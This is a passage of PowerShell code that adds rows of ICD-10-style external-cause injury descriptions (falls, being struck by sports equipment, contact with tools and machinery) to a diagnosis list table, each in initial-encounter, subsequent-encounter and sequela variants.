$DiagnosisList.Rows.Add("Fall from (out of) grocery cart","Fall from (out of) grocery cart, sequela") + $null = $DiagnosisList.Rows.Add("Other fall from one level to another","Other fall from one level to another, initial encounter") + $null = $DiagnosisList.Rows.Add("Other fall from one level to another","Other fall from one level to another, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other fall from one level to another","Other fall from one level to another, sequela") + $null = $DiagnosisList.Rows.Add("Striking against unspecified object with subsequent fall","Striking against unspecified object with subsequent fall, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against unspecified object with subsequent fall","Striking against unspecified object with subsequent fall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against unspecified object with subsequent fall","Striking against unspecified object with subsequent fall, sequela") + $null = $DiagnosisList.Rows.Add("Striking against sports equipment with subsequent fall","Striking against sports equipment with subsequent fall, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against sports equipment with subsequent fall","Striking against sports equipment with subsequent fall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against sports equipment with subsequent fall","Striking against sports equipment with subsequent fall, sequela") + $null = $DiagnosisList.Rows.Add("Striking against glass with subsequent fall","Striking against glass with subsequent fall, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against glass with subsequent fall","Striking against glass with subsequent fall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against glass with subsequent fall","Striking against glass with subsequent fall, sequela") + $null = $DiagnosisList.Rows.Add("Striking against other object with subsequent fall","Striking against other object with subsequent fall, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against other object with subsequent fall","Striking against other object with subsequent fall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against other object with subsequent fall","Striking against other object with subsequent fall, sequela") + $null = $DiagnosisList.Rows.Add("Fall from or off toilet without subsequent striking against object","Fall from or off toilet without subsequent striking against object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from or off toilet without subsequent striking against object","Fall from or off toilet without subsequent striking against object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from or off toilet without subsequent striking against object","Fall from or off toilet without subsequent striking against object, sequela") + $null = $DiagnosisList.Rows.Add("Fall from or off toilet with subsequent striking against object","Fall from or off toilet with subsequent striking against object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from or off toilet with subsequent striking against object","Fall from or off toilet with subsequent striking against object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from or off toilet with subsequent striking against object","Fall from or off toilet with subsequent striking against object, sequela") + $null = $DiagnosisList.Rows.Add("Fall in (into) shower or empty bathtub","Fall in (into) shower or empty bathtub, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall in (into) shower or empty bathtub","Fall in (into) shower or empty bathtub, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall in (into) shower or empty bathtub","Fall in (into) shower or empty bathtub, sequela") + $null = $DiagnosisList.Rows.Add("Fall on same level, unspecified","Fall on same level, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level, unspecified","Fall on same level, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level, unspecified","Fall on same level, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Fall on same level due to stepping on an object","Fall on same level due to stepping on an object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level due to stepping on an object","Fall on same level due to stepping on an object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level due to stepping on an object","Fall on same level due to stepping on an object, sequela") + $null = $DiagnosisList.Rows.Add("Other fall on same level","Other fall on same level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other fall on same level","Other fall on same level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other fall on same level","Other fall on same level, sequela") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling, unspecified","Slipping, tripping and stumbling without falling, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling, unspecified","Slipping, tripping and stumbling without falling, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling, unspecified","Slipping, tripping and stumbling without falling, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling due to stepping on object","Slipping, tripping and stumbling without falling due to stepping on object, initial encounter") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling due to stepping on object","Slipping, tripping and stumbling without falling due to stepping on object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling due to stepping on object","Slipping, tripping and stumbling without falling due to stepping on object, sequela") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling due to stepping into hole or opening","Slipping, tripping and stumbling without falling due to stepping into hole or opening, initial encounter") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling due to stepping into hole or opening","Slipping, tripping and stumbling without falling due to stepping into hole or opening, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling due to stepping into hole or opening","Slipping, tripping and stumbling without falling due to stepping into hole or opening, sequela") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling due to stepping from one level to another","Slipping, tripping and stumbling without falling due to stepping from one level to another, initial encounter") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling due to stepping from one level to another","Slipping, tripping and stumbling without falling due to stepping from one level to another, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Slipping, tripping and stumbling without falling due to stepping from one level to another","Slipping, tripping and stumbling without falling due to stepping from one level to another, sequela") + $null = $DiagnosisList.Rows.Add("Other slipping, tripping and stumbling without falling","Other slipping, tripping and stumbling without falling, initial encounter") + $null = $DiagnosisList.Rows.Add("Other slipping, tripping and stumbling without falling","Other slipping, tripping and stumbling without falling, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other slipping, tripping and stumbling without falling","Other slipping, tripping and stumbling without falling, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fall","Unspecified fall, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified fall","Unspecified fall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified fall","Unspecified fall, sequela") + $null = $DiagnosisList.Rows.Add("Struck by falling object in cave-in","Struck by falling object in cave-in, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object in cave-in","Struck by falling object in cave-in, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object in cave-in","Struck by falling object in cave-in, sequela") + $null = $DiagnosisList.Rows.Add("Struck by object due to collapse of building","Struck by object due to collapse of building, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by object due to collapse of building","Struck by object due to collapse of building, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by object due to collapse of building","Struck by object due to collapse of building, sequela") + $null = $DiagnosisList.Rows.Add("Other cause of strike by thrown, projected or falling object","Other cause of strike by thrown, projected or falling object, initial encounter") + $null = $DiagnosisList.Rows.Add("Other cause of strike by thrown, projected or falling object","Other cause of strike by thrown, projected or falling object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other cause of strike by thrown, projected or falling object","Other cause of strike by thrown, projected or falling object, sequela") + $null = $DiagnosisList.Rows.Add("Struck by hit or thrown ball, unspecified type","Struck by hit or thrown ball, unspecified type, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by hit or thrown ball, unspecified type","Struck by hit or thrown ball, unspecified type, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by hit or thrown ball, unspecified type","Struck by hit or thrown ball, unspecified type, sequela") + $null = $DiagnosisList.Rows.Add("Struck by football","Struck by football, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by football","Struck by football, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by football","Struck by football, sequela") + $null = $DiagnosisList.Rows.Add("Struck by soccer ball","Struck by soccer ball, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by soccer ball","Struck by soccer ball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by soccer ball","Struck by soccer ball, sequela") + $null = $DiagnosisList.Rows.Add("Struck by baseball","Struck by baseball, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by baseball","Struck by baseball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by baseball","Struck by baseball, sequela") + $null = $DiagnosisList.Rows.Add("Struck by golf ball","Struck by golf ball, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by golf ball","Struck by golf ball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by golf ball","Struck by golf ball, sequela") + $null = $DiagnosisList.Rows.Add("Struck by basketball","Struck by basketball, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by basketball","Struck by basketball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by basketball","Struck by basketball, sequela") + $null = $DiagnosisList.Rows.Add("Struck by volleyball","Struck by volleyball, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by volleyball","Struck by volleyball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by volleyball","Struck by volleyball, sequela") + $null = $DiagnosisList.Rows.Add("Struck by softball","Struck by softball, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by softball","Struck by softball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by softball","Struck by softball, sequela") + $null = $DiagnosisList.Rows.Add("Struck by other hit or thrown ball","Struck by other hit or thrown ball, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by other hit or thrown ball","Struck by other hit or thrown ball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by other hit or thrown ball","Struck by other hit or thrown ball, sequela") + $null = $DiagnosisList.Rows.Add("Struck by baseball bat","Struck by baseball bat, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by baseball bat","Struck by baseball bat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by baseball bat","Struck by baseball bat, sequela") + $null = $DiagnosisList.Rows.Add("Struck by tennis racquet","Struck by tennis racquet, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by tennis racquet","Struck by tennis racquet, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by tennis racquet","Struck by tennis racquet, sequela") + $null = $DiagnosisList.Rows.Add("Struck by golf club","Struck by golf club, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by golf club","Struck by golf club, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by golf club","Struck by golf club, sequela") + $null = $DiagnosisList.Rows.Add("Struck by other bat, racquet or club","Struck by other bat, racquet or club, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by other bat, racquet or club","Struck by other bat, racquet or club, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by other bat, racquet or club","Struck by other bat, racquet or club, sequela") + $null = $DiagnosisList.Rows.Add("Struck by ice hockey stick","Struck by ice hockey stick, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by ice hockey stick","Struck by ice hockey stick, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by ice hockey stick","Struck by ice hockey stick, sequela") + $null = $DiagnosisList.Rows.Add("Struck by field hockey stick","Struck by field hockey stick, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by field hockey stick","Struck by field hockey stick, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by field hockey stick","Struck by field hockey stick, sequela") + $null = $DiagnosisList.Rows.Add("Struck by ice hockey puck","Struck by ice hockey puck, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by ice hockey puck","Struck by ice hockey puck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by ice hockey puck","Struck by ice hockey puck, sequela") + $null = $DiagnosisList.Rows.Add("Struck by field hockey puck","Struck by field hockey puck, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by field hockey puck","Struck by field hockey puck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by field hockey puck","Struck by field hockey puck, sequela") + $null = $DiagnosisList.Rows.Add("Struck by shoe cleats","Struck by shoe cleats, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by shoe cleats","Struck by shoe cleats, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by shoe cleats","Struck by shoe cleats, sequela") + $null = $DiagnosisList.Rows.Add("Struck by skate blades","Struck by skate blades, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by skate blades","Struck by skate blades, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by skate blades","Struck by skate blades, sequela") + $null = $DiagnosisList.Rows.Add("Struck by other sports foot wear","Struck by other sports foot wear, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by other sports foot wear","Struck by other sports foot wear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by other sports foot wear","Struck by other sports foot wear, sequela") + $null = $DiagnosisList.Rows.Add("Striking against diving board","Striking against diving board, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against diving board","Striking against diving board, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against diving board","Striking against diving board, sequela") + $null = $DiagnosisList.Rows.Add("Striking against or struck by football helmet","Striking against or struck by football helmet, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by football helmet","Striking against or struck by football helmet, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by football helmet","Striking against or struck by football helmet, sequela") + $null = $DiagnosisList.Rows.Add("Striking against or struck by other sports equipment","Striking against or struck by other sports equipment, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by other sports equipment","Striking against or struck by other sports equipment, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by other sports equipment","Striking against or struck by other sports equipment, sequela") + $null = $DiagnosisList.Rows.Add("Striking against or struck by unspecified sports equipment","Striking against or struck by unspecified sports equipment, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by unspecified sports equipment","Striking against or struck by unspecified sports equipment, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by unspecified sports equipment","Striking against or struck by unspecified sports equipment, sequela") + $null = $DiagnosisList.Rows.Add("Walked into wall","Walked into wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Walked into wall","Walked into wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Walked into wall","Walked into wall, sequela") + $null = $DiagnosisList.Rows.Add("Walked into lamppost","Walked into lamppost, initial encounter") + $null = $DiagnosisList.Rows.Add("Walked into lamppost","Walked into lamppost, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Walked into lamppost","Walked into lamppost, sequela") + $null = $DiagnosisList.Rows.Add("Walked into furniture","Walked into furniture, initial encounter") + $null = $DiagnosisList.Rows.Add("Walked into furniture","Walked into furniture, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Walked into furniture","Walked into furniture, sequela") + $null = $DiagnosisList.Rows.Add("Striking against wall of swimming pool causing drowning and submersion","Striking against wall of swimming pool causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against wall of swimming pool causing drowning and submersion","Striking against wall of swimming pool causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against wall of swimming pool causing drowning and submersion","Striking against wall of swimming pool causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Striking against wall of swimming pool causing other injury","Striking against wall of swimming pool causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against wall of swimming pool causing other injury","Striking against wall of swimming pool causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against wall of swimming pool causing other injury","Striking against wall of swimming pool causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Striking against other stationary object","Striking against other stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against other stationary object","Striking against other stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against other stationary object","Striking against other stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Striking against or struck by unspecified automobile airbag","Striking against or struck by unspecified automobile airbag, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by unspecified automobile airbag","Striking against or struck by unspecified automobile airbag, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by unspecified automobile airbag","Striking against or struck by unspecified automobile airbag, sequela") + $null = $DiagnosisList.Rows.Add("Striking against or struck by driver side automobile airbag","Striking against or struck by driver side automobile airbag, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by driver side automobile airbag","Striking against or struck by driver side automobile airbag, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by driver side automobile airbag","Striking against or struck by driver side automobile airbag, sequela") + $null = $DiagnosisList.Rows.Add("Striking against or struck by front passenger side automobile airbag","Striking against or struck by front passenger side automobile airbag, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by front passenger side automobile airbag","Striking against or struck by front passenger side automobile airbag, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by front passenger side automobile airbag","Striking against or struck by front passenger side automobile airbag, sequela") + $null = $DiagnosisList.Rows.Add("Striking against or struck by other automobile airbag","Striking against or struck by other automobile airbag, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by other automobile airbag","Striking against or struck by other automobile airbag, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by other automobile airbag","Striking against or struck by other automobile airbag, sequela") + $null = $DiagnosisList.Rows.Add("Striking against or struck by other objects","Striking against or struck by other objects, initial encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by other objects","Striking against or struck by other objects, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Striking against or struck by other objects","Striking against or struck by other objects, sequela") + $null = $DiagnosisList.Rows.Add("Caught, crushed, jammed, or pinched between moving objects","Caught, crushed, jammed, or pinched between moving objects, initial encounter") + $null = $DiagnosisList.Rows.Add("Caught, crushed, jammed, or pinched between moving objects","Caught, crushed, jammed, or pinched between moving objects, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Caught, crushed, jammed, or pinched between moving objects","Caught, crushed, jammed, or pinched between moving objects, sequela") + $null = $DiagnosisList.Rows.Add("Caught, crushed, jammed, or pinched between stationary objects","Caught, crushed, jammed, or pinched between stationary objects, initial encounter") + $null = $DiagnosisList.Rows.Add("Caught, crushed, jammed, or pinched between stationary objects","Caught, crushed, jammed, or pinched between stationary objects, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Caught, crushed, jammed, or pinched between stationary objects","Caught, crushed, jammed, or pinched between stationary objects, sequela") + $null = $DiagnosisList.Rows.Add("Contact with lifting devices, not elsewhere classified","Contact with lifting devices, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with lifting devices, not elsewhere classified","Contact with lifting devices, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with lifting devices, not elsewhere classified","Contact with lifting devices, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Contact with transmission devices, not elsewhere classified","Contact with transmission devices, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with transmission devices, not elsewhere classified","Contact with transmission devices, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with transmission devices, not elsewhere classified","Contact with transmission devices, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Contact with sharp glass","Contact with sharp glass, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with sharp glass","Contact with sharp glass, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with sharp glass","Contact with sharp glass, sequela") + $null = $DiagnosisList.Rows.Add("Contact with knife","Contact with knife, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with knife","Contact with knife, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with knife","Contact with knife, sequela") + $null = $DiagnosisList.Rows.Add("Contact with sword or dagger","Contact with sword or dagger, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with sword or dagger","Contact with sword or dagger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with sword or dagger","Contact with sword or dagger, sequela") + $null = $DiagnosisList.Rows.Add("Contact with edge of stiff paper","Contact with edge of stiff paper, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with edge of stiff paper","Contact with edge of stiff paper, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with edge of stiff paper","Contact with edge of stiff paper, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other sharp object(s), not elsewhere classified","Contact with other sharp object(s), not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other sharp object(s), not elsewhere classified","Contact with other sharp object(s), not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other sharp object(s), not elsewhere classified","Contact with other sharp object(s), not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Contact with unspecified sharp object(s)","Contact with unspecified sharp object(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with unspecified sharp object(s)","Contact with unspecified sharp object(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with unspecified sharp object(s)","Contact with unspecified sharp object(s), sequela") + $null = $DiagnosisList.Rows.Add("Contact with workbench tool","Contact with workbench tool, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with workbench tool","Contact with workbench tool, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with workbench tool","Contact with workbench tool, sequela") + $null = $DiagnosisList.Rows.Add("Contact with garden tool","Contact with garden tool, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with garden tool","Contact with garden tool, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with garden tool","Contact with garden tool, sequela") + $null = $DiagnosisList.Rows.Add("Contact with scissors","Contact with scissors, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with scissors","Contact with scissors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with scissors","Contact with scissors, sequela") + $null = $DiagnosisList.Rows.Add("Contact with needle (sewing)","Contact with needle (sewing), initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with needle (sewing)","Contact with needle (sewing), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with needle (sewing)","Contact with needle (sewing), sequela") + $null = $DiagnosisList.Rows.Add("Contact with kitchen utensil","Contact with kitchen utensil, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with kitchen utensil","Contact with kitchen utensil, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with kitchen utensil","Contact with kitchen utensil, sequela") + $null = $DiagnosisList.Rows.Add("Contact with paper-cutter","Contact with paper-cutter, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with paper-cutter","Contact with paper-cutter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with paper-cutter","Contact with paper-cutter, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other nonpowered hand tool","Contact with other nonpowered hand tool, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other nonpowered hand tool","Contact with other nonpowered hand tool, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other nonpowered hand tool","Contact with other nonpowered hand tool, sequela") + $null = $DiagnosisList.Rows.Add("Contact with powered lawn mower","Contact with powered lawn mower, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with powered lawn mower","Contact with powered lawn mower, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with powered lawn mower","Contact with powered lawn mower, sequela") + $null = $DiagnosisList.Rows.Add("Contact with powered kitchen appliance","Contact with powered kitchen appliance, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with powered kitchen appliance","Contact with powered kitchen appliance, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with powered kitchen appliance","Contact with powered kitchen appliance, sequela") + $null = $DiagnosisList.Rows.Add("Contact with electric knife","Contact with electric knife, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with electric knife","Contact with electric knife, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with electric knife","Contact with electric knife, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other powered household machinery","Contact with other powered household machinery, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other powered household machinery","Contact with other powered household machinery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other powered household machinery","Contact with other powered household machinery, sequela") + $null = $DiagnosisList.Rows.Add("Contact with powered garden and outdoor hand tools and machinery","Contact with powered garden and outdoor hand tools and machinery, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with powered garden and outdoor hand tools and machinery","Contact with powered garden and outdoor hand tools and machinery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with powered garden and outdoor hand tools and machinery","Contact with powered garden and outdoor hand tools and machinery, sequela") + $null = $DiagnosisList.Rows.Add("Contact with nail gun","Contact with nail gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with nail gun","Contact with nail gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with nail gun","Contact with nail gun, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other powered hand tools and household machinery","Contact with other powered hand tools and household machinery, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other powered hand tools and household machinery","Contact with other powered hand tools and household machinery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other powered hand tools and household machinery","Contact with other powered hand tools and household machinery, sequela") + $null = $DiagnosisList.Rows.Add("Contact with combine harvester","Contact with combine harvester, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with combine harvester","Contact with combine harvester, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with combine harvester","Contact with combine harvester, sequela") + $null = $DiagnosisList.Rows.Add("Contact with power take-off devices (PTO)","Contact with power take-off devices (PTO), initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with power take-off devices (PTO)","Contact with power take-off devices (PTO), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with power take-off devices (PTO)","Contact with power take-off devices (PTO), sequela") + $null = $DiagnosisList.Rows.Add("Contact with hay derrick","Contact with hay derrick, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hay derrick","Contact with hay derrick, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hay derrick","Contact with hay derrick, sequela") + $null = $DiagnosisList.Rows.Add("Contact with grain storage elevator","Contact with grain storage elevator, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with grain storage elevator","Contact with grain storage elevator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with grain storage elevator","Contact with grain storage elevator, sequela") + $null = $DiagnosisList.Rows.Add("Contact with agricultural transport vehicle in stationary use","Contact with agricultural transport vehicle in stationary use, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with agricultural transport vehicle in stationary use","Contact with agricultural transport vehicle in stationary use, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with agricultural transport vehicle in stationary use","Contact with agricultural transport vehicle in stationary use, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other specified agricultural machinery","Contact with other specified agricultural machinery, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other specified agricultural machinery","Contact with other specified agricultural machinery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other specified agricultural machinery","Contact with other specified agricultural machinery, sequela") + $null = $DiagnosisList.Rows.Add("Contact with unspecified agricultural machinery","Contact with unspecified agricultural machinery, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with unspecified agricultural machinery","Contact with unspecified agricultural machinery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with unspecified agricultural machinery","Contact with unspecified agricultural machinery, sequela") + $null = $DiagnosisList.Rows.Add("Contact with mining and earth-drilling machinery","Contact with mining and earth-drilling machinery, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with mining and earth-drilling machinery","Contact with mining and earth-drilling machinery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with mining and earth-drilling machinery","Contact with mining and earth-drilling machinery, sequela") + $null = $DiagnosisList.Rows.Add("Contact with metalworking machines","Contact with metalworking machines, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with metalworking machines","Contact with metalworking machines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with metalworking machines","Contact with metalworking machines, sequela") + $null = $DiagnosisList.Rows.Add("Contact with powered woodworking and forming machines","Contact with powered woodworking and forming machines, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with powered woodworking and forming machines","Contact with powered woodworking and forming machines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with powered woodworking and forming machines","Contact with powered woodworking and forming machines, sequela") + $null = $DiagnosisList.Rows.Add("Contact with prime movers","Contact with prime movers, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with prime movers","Contact with prime movers, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with prime movers","Contact with prime movers, sequela") + $null = $DiagnosisList.Rows.Add("Contact with recreational machinery","Contact with recreational machinery, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with recreational machinery","Contact with recreational machinery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with recreational machinery","Contact with recreational machinery, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other commercial machinery","Contact with other commercial machinery, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other commercial machinery","Contact with other commercial machinery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other commercial machinery","Contact with other commercial machinery, sequela") + $null = $DiagnosisList.Rows.Add("Contact with special construction vehicle in stationary use","Contact with special construction vehicle in stationary use, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with special construction vehicle in stationary use","Contact with special construction vehicle in stationary use, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with special construction vehicle in stationary use","Contact with special construction vehicle in stationary use, sequela") + $null = 